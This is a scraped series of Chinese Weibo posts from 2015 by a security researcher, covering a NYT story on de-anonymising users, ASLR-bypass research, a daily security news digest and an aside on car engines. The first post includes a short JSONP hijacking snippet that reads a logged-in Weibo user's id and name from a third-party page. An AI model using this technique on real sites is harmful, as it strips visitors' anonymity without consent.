tombkeeper2015-06-16 14:58Open options纽约时报这篇《网络隐私保护工具已无法阻挡中国黑客》(网页链接)讲的,其实就是这个:<script>function callback(weibo) { alert(weibo.userinfo.uniqueid + ":" + weibo.userinfo.displayname); } </script> <script src="hxxp://weibo.com/sso/login.php?callback=callback"></script> 详情
tombkeeper2015-06-16 14:26Open optionsGoogle 最近这篇讲利用 MemoryProtector 过 ASLR 的 Blog (网页链接)写的颇有点怨气。其实从时间线上很容易看出, HP 的报告一定早于 Google。按规则,重复报告后者是啥都没有的。但因为 Google 的内容里可能有些不同于 HP 的东西,所以微软还是给了部分奖金,其实很合理。 详情
tombkeeper2015-06-16 10:22Open options富士康……腾讯安全玄武实验室2015-06-16 10:14被tk转发1次Open options今天的 每日安全动态推送:偷 IDA 的木马;提取和破解 CheckPoint 设备的密码哈希;Duqu 2.0 用了从富士康偷来的证书为驱动签名;IBM Security AppScan Standard <= 9.0.2 RCE 漏洞;开源二进制分析框架 Insight。 详情
tombkeeper2015-06-16 08:26被tk转发4次Open options前几天一个搞汽车发动机的跟我说内燃机在未来五十年内仍然会是汽车的主流动力。理由是:电力不像燃油那样是实体,能看得见。他没说理由之前,我还出于对其专业的信任想将其观点作为参考,但听了这个理由之后,我觉得这也是“我是瑙鲁人所以瑙鲁是世界上最伟大的国家”一类的思路引发的认知失调。 详情